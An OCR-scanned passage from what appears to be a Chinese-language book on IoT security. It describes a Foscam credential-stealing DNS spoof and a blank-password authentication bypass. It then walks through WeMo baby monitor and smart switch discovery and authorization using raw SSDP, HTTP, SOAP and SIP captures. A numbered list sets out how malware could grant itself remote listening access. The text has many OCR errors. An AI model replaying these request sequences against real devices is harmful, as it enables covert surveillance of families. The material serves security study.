7. 攻 击 者 这 时 会 显示 一 个 “无 效用 户 名 或 密码 ”的 信息 ， 导 致 被 攻击 者 认为 他 输入 认证 信息 的 时 候 输 错 了 。 


8. 这 时 ， 攻 击 者 就 会 向 Foscam 动 态 DNS 服 务 发 送 一 个 具有 欺骗 性 的 数据 包 ， 


数据 包 里 是 攻击 者 第 一 步 捕获 的 设备 原始 IP 地 址 。 这 时 ， 当 用 户 再 次 访问 


aa0000.myfoscam.org 时 ， 会 被 重新 定向 到 真正 的 Foscam 设 备 上 ， 而 不 是 访问 到 攻击 者 的 web 服 务 器 上 。 通 过 这 种 方法 ， 攻 击 者 可 以 获取 被 攻击 对 象 的 认证 信息 ， 而 受害 人 
却 一 点 也 不 会 怀疑 他 的 认证 信息 已 经 被 窃取 了 。 攻击 者 这 时 就 能 够 直接 进入 被 攻击 者 的 设备 中 ， 重 新 使 用 捕获 的 认证 信息 登录 并 控制 设备 了 。 


Gilbert 的 案例 里 ， 我 们 还 不 知道 黑客 用 的 是 哪 种 攻击 手段 。 但 是 到 目前 为 止 


3.1.5” 续 写 Foscam 的 传奇 故事 
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， 一 种 合理 的 假设 就 是 : 黑客 可 以 将 这 几 种 漏洞 攻击 技术 综合 地 加 以 利用 。 


Gilbert 事 件 发 生 于 2013 年 8 月 。2014 年 4 月 ， 在 Heather Schreck 家 中 发 生 了 另 一 起 事故 。 大 概 是 午夜 时 分 ，Heather 女 儿 Emma 卧 室 里 传 出 了 一 个 男人 的 声音 ， 吓 坏 了 
Heather。Heather 注 意 到 婴儿 监控 摄像 机 发 生 了 移动 ， 并 且 听 到 设备 中 传 出 一 个 声音 “起 来 了 ， 孩 子 ， 起 来 了 ， 孩 子 ”。Heather 的 丈夫 Adam 冲 进 Emma 的 房间 ， 看 见 摄像 
机 转向 了 他 们 ， 并 听 到 了 针对 他 们 的 污 言 物语 。Adam 赶 紧 拔 掉 了 摄像 机 电源 。 你 猜 的 没 错 ， 这 也 是 一 台 Foscam 摄 像 机 。 


这 是 另 一 个 实例 ， 说 明了 漏洞 是 如 何在 类 似 于 婴儿 监控 摄像 机 这 样 的 物 联网 设备 上 存在 的 ， 特 别 是 ， 当 设备 制造 商 并 没有 对 设备 中 存在 的 漏洞 进行 严 丝 合 颖 的 修补 时 。 如 


上 我 们 讨论 过 的 ， 绝 大 多 数 人 是 不 会 手动 更 新 设备 的 ， 没 有 几 个 人 会 花费 心思 去 查找 和 更 新 安全 补丁 。 考 虑 到 使 用 Shodan 查 询 就 能 发 现 运行 于 互联 网 内 的 Foscam 设 备 多 达 几 


十 万 台 ， 那 么 发 生 在 Glbert 和 Schreck 家 中 的 案例 还 会 再 次 重演 。 


2014 年 1 月 ， 仅 仅 在 Schreck 事 件 之 前 没 多 久 ， 一 个 用 户 在 Foscam 公 共 论 坛 上 公开 发 布 了 一 个 非常 严重 的 认证 旁 路 (authentication bypass) 漏洞 (如 图 3-5 所 示 ) 。 


根据 论坛 上 发 布 的 内 容 ， 将 用 户 名 和 密码 字段 都 置 为 空 ， 就 完全 有 可 能 绕 过 认证 。 作 为 回应 ，Foscam 发 布 了 一 个 补丁 以 解决 这 一 问题 ， 但 是 手动 打 补 丁 的 步骤 与 图 3-4 列 
出 来 的 一 样 。 因 此 ， 如 此 繁琐 的 手动 修补 过 程 致使 通过 互联 网 来 完成 对 Foscam 设 备 的 修补 几乎 是 不 可 能 的 。 


虽然 还 不 能 确切 知道 在 Gilbert 和 Schreck 案 例 中 ， 黑 客 到 底 使 用 了 哪 种 攻击 手段 ， 但 是 认证 旁 路 是 最 容易 被 滥用 的 问题 之 一 ， 因 此 考虑 到 使 用 Shodan 能 够 查询 到 的 设备 


数量 ， 很 有 可 能 一 些 Foscam 用 户 的 隐私 已 经 被 人 使 用 这 种 攻击 手段 所 获取 了 。 
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| have been trying to set up a FOSCAM FI8905W construction 2014 1:24 am 
camera for a couple of weeks now. 


Regardless of the HTML used to access the camera on a web 
page (Recently tried Don's amazing utility), the user was asked 
for a user name and password the first time they went to view 
even when these were correctly provided in the HTML code. The 
prompt for user/pwd would only appear the first access to the 
page and the user would not be prompted again as long as they 
did not completely shut down their browser. 


I discovered fairly early in my testing, that the user could just 
press OK in the dialogue window without filling in a user or pwd 
and they would be taken to the image. | assumed this was 
because the code was passing the credentials to the firmware in 
the background. 


However, | used Don's testing utility yesterday and discovered | 
was taken to the image even when | did not provide a user and 
pwd. | confirmed this by creating a test web page that again 
does not provide ANY user or pwd. If the viewer just presses OK 
when prompted and leaves both fields blank, they are still taken 
to the image. 


The test page is http:/ /www.senwi.ca/Misc/test.html 


图 3-5: Foscam 论 坛 上 公布 的 认证 旁 路 漏洞 


3.2 Belkin WeMo 婴 儿 上 监控 器 


Wemo 婴 儿 上 监控 器 (如 图 3-6 所 示 ) 可 以 使 用 配套 的 iOS 应 用 程序 进行 访问 。 跟 基于 无 线 电 的 监控 器 不 同 ，iOS 应 用 程序 用 户 可 以 在 世界 上 任何 能 够 接 入 互联 网 的 地 方 访问 
婴儿 监控 器 。Belkin 的 物 联 网 设备 非常 畅销 ， 因 此 关注 这 款 产 品 是 很 有 必要 的 。 本 节 ， 我 们 就 来 看 看 WeMo 设 备 的 认证 连接 是 怎样 的 ， 了 解 一 下 内 置 的 安全 机 制 。 


要 想 将 一 个 iOS 设 备 连 接 到 WeMo 上 ， 用 户 首先 必须 要 下 载 WeMo Baby 应 用 程序 ， 然 后 按 提示 运行 ， 如 图 3-7 所 示 。 


图 3-6: Belkin WeMo 婴 儿 监 控 器 
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图 3-7: WeMo Baby iOS 应 用 程序 


生产 商 不 再 生产 WeMo 婴 儿 产 品 了 。 然 而 ， 很 多 家 庭 仍然 在 使 用 WeMo 婴 儿 产品 。 而 有 全， 由 于 其 产品 的 设计 和 架构 与 我 们 前 边 讨论 的 Foscam 设 备 存 在 着 诸多 不 同 ， 因 
而 ， 对 我 们 来 说 ， 它 是 一 个 可 以 开展 揭示 安全 问题 研究 的 很 好 的 候选 产品 。 


当 用 户 在 本 地 WiFi 网 络 上 运行 iOSs 应 用 程序 时 ， 应 用 程序 就 会 使 用 简单 服务 发 现 协议 (Simple Service Discovery Protocol, SSDP) 尝试 定位 婴儿 监控 器 ， 它 是 通用 即 插 
即 用 协议 (Universal Plug and Play, UPnP) 的 一 个 组 件 。 为 了 找到 婴儿 监控 器 ，iOS 应 用 程序 会 向 |P 地 址 为 239.255.255.250 (一 个 常用 的 用 于 检测 类 似 于 WeMo 监 控 器 这 
样 设备 的 组 播 地 址 ) 的 1900 端 口 发 送 UDP 组 播 包 : 


M-SEARCH * HTTP/1.1 

ST: upnp:rootdevice 

MX: 3 

MAN: "ssdp:discover" 

HOST: 239.255.255.250:1900 


因为 这 是 一 个 组 播 包 ， 所 以 它 会 被 广播 至 整个 本 地 网 络 上 。 然 而 ， 只 有 正 监听 SSDP 包 的 设备 (如 WeMo 监 控 器 ) 才 会 处 理 包 请 求 。 这 里 ，WeMo 监 控 器 向 iOS 应 用 程序 
发 送 如 下 UDP 包 作为 响应 : 


HTTP/1.1 200 OK 

CACHE-CONTROL: max-age-86400 

EXT: 

LOCATION: http://10.0.1.2:49153/setup.xml 

OPT: "http://schemas.upnp.org/upnp/1/0/"; ns-01 

SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.6.18 
X-User-Agent: redsonic 

ST: upnp:rootdevice 

USN: uuid:wemo baby-1 O-[serialNumber DELETED]: :upnp:rootdevice 


根据 收 到 的 响应 信息 ，iOS 应 用 程序 会 捕获 到 婴儿 监控 器 的 IP 地 址 (10.0.1.2) 和 目标 端口 (49153) ， 以 及 用 于 请 求 设置 初始 接 入 的 目标 资源 (/setup.xml) 。 注 意 , 监 
控 器 发 来 的 响应 信息 还 包含 了 印 在 WeMo 设 备 底部 的 序列 号 。 


iOS 应 用 程序 这 时 会 发 送 如 下 GET 请 求 信息 给 婴儿 监控 器 (IP 地址 是 10.0.1.2，TCP 端 口 是 49153) : 


GET /setup.xml HTTP/1.1 
Content-Length: 0 

HOST: 10.0.1.2:49153 

User-Agent: CyberGarage-HTTP/1.0 


WeMo 监 控 器 返回 的 响应 信息 如 下 : 


<root xmlns="urn:Belkin:device-1-0"> 
<specVersion> 
<major>1</major> 
<minor>0</minor> 
</specVersion> 
«device» 
«deviceType»urn:Belkin:device:wemo baby:l«/deviceType» 
«friendlyName»WeMo Baby«/friendlyName» 
«manufacturer»Belkin International Inc.«/manufacturer» 
«manufacturerURL»http://www.belkin.com«/manufacturerURL» 
«modelDescription»Belkin Plugin Socket 1.0«/modelDescription» 
«modelName»Socket«/modelName» 
«modelNumber?1.0«/modelNumber» 
«modelURL»http://www.belkin.com/plugin/«/modelURL» 
«serialNumber» [DELETED]«/serialNumber» 
XUDN»uuid:wemo baby-1 O«/UDN» 
«UPC»2123456789«/UPC» 
«macAddress» [DELETED] «/macAddress» 
«firmwareVersion»WeMo WW 2.00.2397.PVT Baby«/firmwareVersion» 
«iconVersion»0|49153«/iconVersion» 
«binaryState»0«/binaryState» 
XiconList» 
«icon» 
«mimetype»jpg«/mimetype» 
«width»100«/width» 
Xheight»100«/height» 
«depth»100«/depth» 
«url»icon.jpg«/url» 
«/icon» 
«/iconList» 
Xservicelist» 

«service» 
XserviceType»urn:Belkin:service:WiFiSetup:l«/serviceType» 
XserviceId»urn:Belkin:serviceId:WiFiSetupl«/serviceId» 
«controlURL»/upnp/control/WiFiSetupl«/controlURL» 
«eventSubURL»/upnp/event/WiFiSetupl«/eventSubURL» 
«SCPDURL»/setupservice.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:timesync:l«/serviceType» 
«serviceId»urn:Belkin:serviceId:timesyncl«/serviceId» 
«controlURL»/upnp/control/timesyncl«/controlURL» 
«eventSubURL»/upnp/event/timesyncl«/eventSubURL» 
«SCPDURL»/timesyncservice.xml«/SCPDURL- 

«/service» 

«service» 
XserviceType»urn:Belkin:service:basicevent:1«/serviceType» 
XserviceId»urn:Belkin:serviceId:basiceventl«/serviceld» 
«controlURL»/upnp/control/basiceventl«/controlURL» 
«eventSubURL»/upnp/event/basiceventl«/eventSubURL» 
«SCPDURL»/eventservice.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:firmwareupdate:l1«/serviceType» 
X«serviceId»urn:Belkin:serviceId:firmwareupdatel«/serviceld» 
«controlURL»/upnp/control/firmwareupdatel«/controlURL» 
«eventSubURL-»/upnp/event/firmwareupdatel«/eventSubURL» 
«SCPDURL»/firmwareupdate.xml«/SCPDURL» 

«/service» 


«service» 
XserviceType»urn:Belkin:service:rules:1«/serviceType» 
X«serviceId»urn:Belkin:serviceId:rulesl«/serviceId» 
«controlURL»/upnp/control/rulesl«/controlURL» 
«eventSubURL»/upnp/event/rules1«/eventSubURL» 


<SCPDURL>/rulesservice.xml</SCPDURL> 
</service> 


<service> 
<serviceType>urn:Belkin:service:metainfo:1</serviceType> 
XserviceId»urn:Belkin:serviceId:metainfol«/serviceId» 
XcontrolURL»/upnp/control/metainfol«/controlURL» 
«eventSubURL»/upnp/event/metainfol«/eventSubURL» 
«SCPDURL»/metainfoservice.xml«/SCPDURL» 

«/service» 


«service» 
XserviceType»urn:Belkin:service:remoteaccess:1«/serviceType» 
XserviceId»urn:Belkin:serviceId:remoteaccessl«/serviceld» 
«controlURL»/upnp/control/remoteaccess1l«/controlURL» 
«eventSubURL-»/upnp/event/remoteaccess1«/eventSubURL» 
«SCPDURL»?/remoteaccess.xml«/SCPDURL» 

«/service» 


«/serviceList» 
XpresentationURL»/pluginpres.html«/presentationURL» 
«/device» 
«/root» 


注意 ， 与 响应 SSDP 请 求 时 一 样 ， 这 里 WeMo 设 备 再 次 返回 了 序列 号 。 响 应 信息 还 包含 了 其 他 服务 ， 最 有 趣 的 是 /upnp/control/remoteaccess1。iOS 应 用 程序 向 该 服务 
发 送 如 下 POST 请 求 以 获取 连接 WeMo 和 收听 音频 的 授权 : 


POST /upnp/control/remoteaccessl HTTP/1.1 
Content-Type: text/xml; charset-"utf-8" 
SOAPACTION: "urn:Belkin:service:remoteaccess:lfRemoteAccess" 
Content-Length: 589 
HOST: 10.0.1.2:49153 
User-Agent: CyberGarage-HTTP/1.0 
«?xml version-"1.0" encoding-"utf-8"?» 
X«s:Envelopexmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
S:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"» 
«s:Body» 
«u:RemoteAccessxmlns:u-"urn:Belkin:service:remoteaccess:1"» 
«DeviceId» [DELETED]«/Deviceld» 
«dst»0«/dst» 
«HomeId»«/HomeId» 
X«DeviceName»iPad 4G«/DeviceName» 
«MacAddr»«/MacAddr» 
«smartUniqueId»«/smartUniqueId» 
«numSmartDev»«/numSmartDev» 
X/u:RemoteAccess» 
«/s:Body» 
«/s:Envelope» 


注意 Deviceld 字 段 ， 这 是 iOS 应 用 程序 创建 的 一 个 任意 值 令 牌 。WeMo 设 备 的 响应 信息 如 下 : 


HTTP/1.1 200 OK 

CONTENT-LENGTH: 631 

CONTENT-TYPE: text/xml; charset-"utf-8" 

EXT: 

SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.6.18 
X-User-Agent: redsonic 


«s:Envelopexmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"»«s:Body» 
«u:RemoteAccessResponsexmlns:u-"urn:Belkin:service:remoteaccess:1"» 
XhomeId»610337«/homeId» 

«resultCode»PLGN 200«/resultCode» 
«description»Successful«/description» 

«statusCode»S«/statusCode» 

«smartUniqueId» [DELETED] «/smartUniqueId» 
«numSmartDev»3«/numSmartDev» 

«/u:RemoteAccessResponse» 

«/s:Body»«/s:Envelope» 


iOS 应 用 程序 发 布 的 Deviceld 令 牌 现在 被 授权 了 。 注 意 ，WeMo 返 回 的 smartUniqueld 字 段 的 值 与 iOS 应 用 程序 在 初始 请 求 中 发 出 的 Deviceld 值 是 相同 的 。 该 值 与 稍 早 获 
取 的 序列 号 是 仅 有 的 两 个 从 互联 网 接 入 婴儿 监控 器 以 及 收听 音频 时 需要 的 令 牌 。 


iOs 应 用 程序 和 WeMo 设 备 使 用 会 话 发 起 协议 (Session Initiation Protocol, SIP) 建立 互相 连接 ， 使 用 该 协议 允许 iOS 应 用 程序 收听 音频 信息 。 这 是 很 有 意义 的 ， 因 为 
SIP 本 身 就 是 一 个 用 于 通过 互联 网 进行 音频 呼叫 的 通用 协议 。 为 了 建立 连接 ，iOS 应 用 程序 发 起 INVITE 动 作 来 初始 化 呼叫 : 


SIP/2.0 100 Trying 

Via: SIP/2.0/TCP 10.0.0.2:59662;rport=4096;received=10.0.0.115; 
Record-Route: «sip:k2.k.belkin.evodevices.com:6060;transport-tcp;lr; 
did-f9e.f801;nat-yes» 

From: «sip: [DELETED but same as smartUniqueId and DeviceID]G 
bedev.evomonitors.com»; 

To: «sip: [DELETED but same as serialNumber]Gbedev.evomonitors.com» 
CSeq: 5874 INVITE 

Content-Length: 0 


注意 ，iOS 应 用 程序 连接 的 主机 是 k2.k.belkin.evodevices.com， 它 可 以 通过 互联 网 进行 访问 。 也 就 是 说 ，iOS 应 用 程序 用 户 可 以 在 世界 上 任何 能 接 入 互联 网 的 地 方 访 
问 k2.k.belkin.evodevices.com (用 户 只 需要 进入 WeMo 监 控 设备 所 在 的 网 络 一 次 ， 就 可 以 连接 设备 ， 并 可 以 使 用 刚才 描述 的 /upnp/control/remoteaccess1 来 获取 授权 ) 。 
进而 ，iOS 应 用 程序 只 需要 serialINumber 和 smartUniquelD 值 (与 Deviceld 值 相同 ) 。 这 时 ， 运 行 在 k2.k.belkin.evodevices.com 上 的 SIP 服 务 器 发 出 的 响应 信息 如 下 : 


SIP/2.0 200 OK 

Via: SIP/2.0/TCP 10.0.0.2:59662; rport-4096;received-10.0.0.115; 
Record-Route: «sip:k2.k.belkin.evodevices.com:6060;transport-tcp;lr; 
did-f9e.f801;nat-yes» 

From: «sip: [DELETED but same as smartUniqueId and DeviceID]G 
bedev.evomonitors.com»; 

To: «sip: [DELETED but same as serialNumber]Gbedev.evomonitors.com»; 


CSeq: 5874 INVITE 

Contact: «sip: [DELETED but same as serialNumber]810.0.0.115:3925; 
transport-tcp; ob»;-tsip.ice 

Allow: PRACK, INVITE, ACK, BYE, CANCEL, UPDATE, SUBSCRIBE, NOTIFY, REFER, 
MESSAGE, OPTIONS 

Supported: replaces, 100rel, timer, norefersub 

Session-Expires: 91;refresher-uac 

Content-Type: application/sdp 

Content-Length: 368 


v-0 

o-- 3589015852 3589015853 IN IP4 10.0.1.2 
s=pjmedia 

c=IN IP4 10.0.1.2 

b=AS:84 

t=0 0 

a-X-nat:0 

m=audio 3106 RTP/AVP 3 96 

C-IN IP4 10.0.1.2 

b-TIAS:64000 

b-RS:0 

b-RR:0 

a-sendrecv 

a-rtpmap:3 GSM/8000 

a-rtpmap:96 telephone-event/8000 
a-fmtp:96 0-15 

a-candidate:Ha000102 1 UDP 2130706431 10.0.1.2 3106 typ host 


这 时 ， 连 接 就 建立 起 来 了 ，iOS 应 用 程序 就 可 以 收听 到 从 WeMo 婴 儿 监 控 器 传送 过 来 的 音频 信息 了 。 


3.2/1. “ 粳 糕 的 安全 设计 


正如 我 们 看 到 的 ，iOSs 应 用 程序 只 需要 访问 婴儿 监控 器 所 在 网 络 一 次 ， 就 可 以 触发 /upnp/controVremoteaccess1 服 务 。 一 旦 这 么 做 了 ，iOs 应 用 程序 就 可 以 通过 使 用 SIP 
协议 访问 k2.k.belkin.evodevices.com 服 务 器 ， 能 在 世界 各 地 监听 婴儿 监控 器 。 很 明显 ， 任 何 访问 过 本 地 WiFi 网 络 的 用 户 ， 不 需要 认证 和 授权 都 能 够 注册 成 功 。 他 们 可 以 持续 
访问 婴儿 监控 器 ， 直 到 本 地 用 户 (在 本 地 WiFi 网 络 中 使 用 iOS 应 用 程序 ) 从 访问 列表 中 删除 其 设备 。 关 于 如 何 删除 ， 在 我 的 YouTube 视 频 上 有 相关 的 内 容 说 明 。 


现实 情况 是 ， 当 一 位 拜访 者 到 别人 家 做 客 ， 请 求 临 时 使 用 主人 家 的 个 人 WiFi 网 络 时 ， 这 一 漏洞 可 能 会 成 为 真正 的 问题 。 如 果 客 人 访问 了 WeMo Baby 应 用 程序 ， 他 就 能 够 
远程 持续 监听 婴儿 监控 器 了 。 下 面 是 一 份 说 明 ，Lon JSeidman 在 亚马逊 上 写 了 一 段 关 于 WeMeo Baby 产 品 的 评论 ， 明 确 阐述 了 产品 存在 的 设计 问题 : 


een 但 是 ， 这 并 不 是 唯一 困扰 该 设备 的 问题 。 还 存在 着 一 个 非常 粮 粒 的 安全 隐患 ; 将 WeMo 暴 露 于 不 受 欢迎 的 监控 环境 中 。WeMo 允 许 任何 网 络 上 的 iOS 设 备 连接 和 监听 ， 
不 需要 任何 密码 。 如 果 这 还 不 够 宰 粒 ， 那 么 当 一 个 iPhone 设 备 接 入 本 地 网 络 ， 它 就 可 以 在 任何 地 方 进入 到 监控 器 中 。Belkin 假 定 你 的 访问 点 是 固定 的 ， 只 有 你 认识 的 人 才能 访 
间 它 。 还 有 一 点 特别 麻烦 ， 人 们 并 没有 固定 的 访问 点 ， 或 者 他 们 使 用 弱 安 全 机 制 很 容易 被 黑客 攻击 。 


看 上 去 Belkin 已 经 承认 了 软件 中 存在 漏洞 ，( 他 们 的 网 站 上 ) 显示 了 哪些 设备 可 以 连接 WeMo， 以 及 是 否 允 许 全 网 窥探 。 遗 憾 的 是 ，WeMo 给 予 每 一 个 设备 可 以 随便 进出 的 
大 门 ， 而 要 求 你 去 持续 不 断 地 进行 监控 ， 确 保 未 授权 的 监听 无 法 连 入 设备 。 


底线 呢 ? 就 有 效 地 监控 我 的 孩子 来 说 ， 它 是 不 可 靠 的 ， 在 防止 他 人 窥探 我 的 隐私 方面 ， 它 也 不 够 安全 。 因 而 ， 我 不 推荐 这 款 产 品 。 
针对 Seidman 的 评论 ，Belkin 给 出 了 他 们 的 解释 : 
Lon 你 好 ， 


谢谢 你 对 WeMo 视 频 婴 儿 监 控 器 的 评论 。 对 你 提出 的 安全 问题 ， 我 们 表示 感谢 ， 下 面 就 你 的 问题 我 们 给 出 回答 。 在 使 用 密码 加 密 WiFi 的 家 庭 网 络 环境 中 ， 我 们 产品 的 安全 
性 与 网 络 中 其 他 产品 的 安全 性 是 一 样 的 。 因 为 ， 要 想 访问 婴儿 监控 器 ， 就 需要 WiFi 密 码 。 如 果 家 里 的 WiFi 网 络 没有 设置 密码 ， 我 们 会 建议 用 户 设置 一 个 ， 因 为 这 样 对 于 网 络 
的 所 有 设备 来 讲 都 是 安全 的 。 我 们 会 将 这 一 建议 加 入 到 常见 问题 说 明 当 中 。 


正确 识别 之 后 ， 信 任 的 朋友 或 其 他 家 庭 成 员 可 以 获取 WiFi 密 码 ， 从 而 访问 家 庭 网 络 。 我 们 坚信 这 是 系统 积极 的 一 面 ， 可 以 促使 人 们 认真 对 待 密码 共享 问题 。 然 而 ， 对 那些 
存 怀疑 态度 的 用 户 来 讲 ， 如 果 他 们 不 愿意 其 他 人 监听 到 婴儿 监控 器 ， 他 们 可 以 登录 到 婴儿 监控 设备 ， 禁 用 掉 远 程 访问 功能 。 


如 果 您 还 有 什么 其 他 反馈 要 与 我 们 分 享 ， 我 们 会 非常 高 兴 ， 请 将 您 的 建议 发 送 至 : customercare (Wbelkin.com。 
祝 好 ! 
Belkin 技 术 支 持 


在 家 中 添加 其 他 物 联网 设备 时 ， 我 们 必须 依赖 于 WiFi 网 络 的 安全 性 。 出 于 对 隐私 和 安全 性 潜在 影响 的 考虑 ， 我 们 不 可 能 把 所 有 的 赌注 都 压 在 关闭 一 台 可 能 会 被 攻陷 的 设备 
(计算 机 或 物 联 网 设备 ) 上 。 未 来 ， 发 达 国家 的 很 多 家 庭 都 会 拥有 几 十 个 可 远程 控制 的 物 联 网 设备 。WiFi 密 码 不 会 是 产生 问题 的 唯一 缘由 。 更 重要 的 是 ， 一 台 被 攻陷 了 的 计算 
机 或 设备 总 是 可 以 访问 网 络 的 ， 因 而 一 个 远程 攻击 者 可 能 根本 就 不 需要 密码 。 这 涉及 恶意 软件 的 问题 ， 下 一 节 我 们 会 进行 讨论 。 


3.2.2 ”疯狂 的 恶意 软件 


某 些 时 候 ， 家 庭 工作 站 或 笔记 本 电脑 会 感染 上 恶意 软件 ， 但 这 种 情况 不 总 发 生 。 鉴 于 恶意 软件 的 流行 ， 操 作 系统 越 来 越 多 的 被 设计 为 默认 是 打开 防火 墙 的 。 这 样 做 的 目的 
是 让 本 地 网 络 上 的 设备 在 初始 情况 下 并 不 认为 其 他 设备 也 是 安全 的 。 


现在 考虑 WeMo Baby 的 情况 。 如 果 本 地 网 络 中 的 某 个 设备 被 攻陷 了 ， 通 过 以 下 简单 的 几 步 ， 恶 意 软件 就 可 以 很 轻松 地 获取 授权 : 


1. 使 用 SSDP 在 本 地 网 络 中 定位 WeMo Baby。 

2. 向 /setup.xm| 发 送 GET 请 求 ， 获 取 serialINumber。 

3. 向 /upnp/control/remoteaccess1 发 送 一 个 带 有 可 自选 择 DevicelD 的 POST 请 求 。 

4. 向 恶意 软件 拥有 者 发 送 serialINumber 和 DevicelD。 就 如 刚才 我 们 讨论 过 的 SIP 请 求 描述 的 那样 ， 这 是 启动 与 婴儿 监视 器 的 连接 和 监听 所 需 的 秘密 信息 。 


我 们 可 以 认为 恶意 软件 拥有 者 会 扫描 本 地 网 络 查找 婴儿 监视 器 。 一 旦 找到 了 一 台 设 备 ， 这 也 是 很 容易 实现 的 ， 那 么 所 有 的 本 地 设备 就 都 有 权 远 程 访 问 WeMo 婴 儿 监 控 器 
了 。 恶 意 软件 拥有 者 成 功 攻陷 用 户 家 中 的 工作 站 和 笔记 本 电脑 之 后 ， 他 也 就 能 够 访问 安装 于 家 中 的 每 一 台 WeMo 婴 儿 监控 器 了 。 


3.3 ”有 些 事情 从 没有 改变 过 : WeMo 智 能 开关 


在 很 多 公司 ， 安 全 设计 要 人 么 做 得 很 好 ， 要 么 只 存在 于 整个 企业 生产 线 的 末端 。 通 常 ， 企 业 文 化 很 大 程度 上 取决 于 行政 领导 ， 而 最 终 会 听命 于 董事 会 和 股东 ， 并 认识 到 安全 
的 重要 性 。 这 方面 的 一 个 很 明显 的 例子 是 ， 比 尔 : 盖 茨 在 2002 年 发 给 全 体 微软 员工 的 那 份 著名 的 备忘录 ， 里 边 他 写 到 : 


过 去 ， 我 们 通过 添加 新 的 特性 和 功能 ， 利 用 平台 丰富 的 扩展 性 吸引 用 户 。 我 们 已 经 做 了 非常 了 不 起 的 工作 ， 但 是 如 果 客 户 不 信任 我 们 的 软件 ， 那 么 所 有 这 些 伟大 的 特性 都 
算 不 上 什么 了 。 因 而 现在 ， 当 我 们 面 对 是 增加 特性 还 是 解决 安全 问题 的 选择 时 ， 我 们 选择 了 后 者 。 我 们 强调 产品 开 箱 即 用 的 安全 性 ， 面 对 威胁 的 演变 ， 我 们 必须 不 断 地 提炼 和 


改进 安全 策略 。 


盖 荡 是 在 微软 的 知名 软件 漏洞 被 遍布 世界 的 黑客 所 利用 之 时 发 布 的 这 段 备忘录 。 一 个 典型 的 例子 就 是 : 发 布 于 2001 年 的 Nimda 蠕 虫 病毒 ， 后 来 成 为 互联 网 影响 最 大 的 里 
虫 病毒 。 该 病毒 可 以 感染 众多 微软 设计 开发 的 操作 系统 ， 包 括 Windows 95、98、ME、NT 和 2000。 


10 年 之 后 ， 微 软 执行 官 Craig Mundie 向 所 有 的 微软 员工 发 表 了 一 份 声明 ， 反 思 了 盖 荡 的 备忘录 ， 并 指出 微软 所 取得 的 进步 : 


过 去 10 年 ， 我 们 内 部 和 外 部 的 工作 都 姓 庸 置疑 地 提升 了 软件 的 质量 ， 并 展示 了 我 们 建设 可 信赖 产品 的 承诺 。 由 于 我 们 严格 执行 安全 开发 生命 周期 (Security Development 
Lifecycle) ， 同 时 我 们 也 愿意 将 其 共享 给 他 人 ， 因 而 在 安全 领域 ， 我 们 公认 是 领先 的 。 对 隐私 而 言 ， 我 们 是 第 一 家 为 开发 人 员 发布 隐 私 保护 标准 的 企业 ， 也 是 第 一 家 为 消费 者 
提供 分 层 隐私 声明 的 企业 。 对 可 靠 性 而 言 ， 我 们 提供 了 更 好 的 诸如 Windows 错 误 报告 这 类 的 工具 ， 可 以 帮助 我 们 解决 系统 崩溃 ， 提 高 生产 效率 ， 缓 解 用 户 受 挫 感 。 


Belkin 是 怎样 做 的 呢 ? 我们 已 经 详细 了 解 了 Belkin WeMo 婴 儿 监 视 器 这 款 产 品 ， 现 在 我 们 来 看 另 一 款 产品 (WeMo Switch) ， 这 也 是 Belkin 设 计 的 ， 来 看 看 他 的 产品 线 
生产 的 产品 在 安全 问题 上 是 否 具有 相似 性 。 这 让 我 们 从 另 一 个 角度 来 理解 不 安全 的 设计 是 否 渗入 到 了 公司 的 骨髓 当中 。 许 多 当前 和 未 来 的 物 联网 公司 都 必须 在 产品 安全 方面 保 
持 一 致 性 ， 所 以 分 析 一 家 公司 的 多 个 产品 是 很 重要 的 。 


用 户 使 用 Belkin 无 线 WeMo 智 能 开关 (如 图 3-8 所 示 ) 可 以 在 任何 地 方 打开 或 关闭 家 中 的 电子 设备 。WeMo 智 能 开关 使 用 家 庭 WiFi 网 络 ， 提 供 对 电灯 、 风 扇 、 电 加 热 器 以 
及 其 他 可 插入 智能 开关 电子 设备 的 无 线 控制 。 你 只 需要 从 谷歌 的 Play Store 上 或 者 Apple Store 上 免费 下 载 WeMo 应 用 程序 ， 然 后 将 智能 开关 揪 到 插座 上 ， 再 将 设备 插入 到 智 
能 开关 上 。 之 后 ， 你 就 可 以 用 WeMo 应 用 程序 在 任何 地 方 打开 或 关闭 你 的 设备 了 。 


WeMo 应 用 程序 (如 图 3-9 所 示 ) 非常 简单 。 只 需 运 行 后 单 击 电源 按钮 ， 即 可 打开 或 关闭 智能 电源 开关 ， 从 而 打开 或 关闭 插入 智能 开关 的 电子 设备 的 电源 。 


图 3-8: Belkin WeMo 智 能 开关 
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图 3-9: WeMo 智 能 开关 应 用 程序 


应 用 程序 通过 广播 如 下 SSDP 请 求 来 定位 智能 开关 : 


M-SEARCH * HTTP/1.1 
HOST:239.255.255.250:1900 
ST:upnp:rootdevice 

MX:2 

MAN:"ssdp:discover" 


智能 开关 发 送 如 下 响应 信息 : 


HTTP/1.1 200 OK 

CACHE-CONTROL: max-age-86400 

DATE: Mon, 14 Oct 2013 10:48:31 GMT 

LOCATION: http://10.0.1.8:49153/setup.xml 

OPT: "http://schemas.upnp.org/upnp/1/0/"; ns-01 
SERVER: Unspecified, UPnP/1.0, Unspecified 
X-User-Agent: redsonic 

ST: upnp:rootdevice 

USN: uuid:Socket-1 0::upnp:rootdevice 


这 与 WeMo Baby 应 用 程序 定位 婴儿 监控 器 的 方式 是 一 样 的 。 根 据 我 们 前 边 的 讨论 思路 ， 接 下 来 要 从 运行 于 智能 开关 上 的 web 服 务 器 上 获取 setup.xml 文 件 的 内 容 。 内 容 
看 上 去 会 是 下 面 的 样子 (敏感 信息 已 删除 ) : 


<?xml version-"1.0"?» 
«root xmlns-"urn:Belkin:device-1-0"» 

«specVersion» 

«major»1«/major» 
«minor»0«/minor» 

«/specVersion» 

«device» 
«deviceType»urn:Belkin:device:controllee:1«/deviceType» 
«friendlyName»WeMo Switch«/friendlyName» 

«manufacturer»Belkin International Inc.«/manufacturer» 
«manufacturerURL»http://www.belkin.com«/manufacturerURL» 
«modelDescription»Belkin Plugin Socket 1.0«/modelDescription» 
«modelName»Socket«/modelName» 

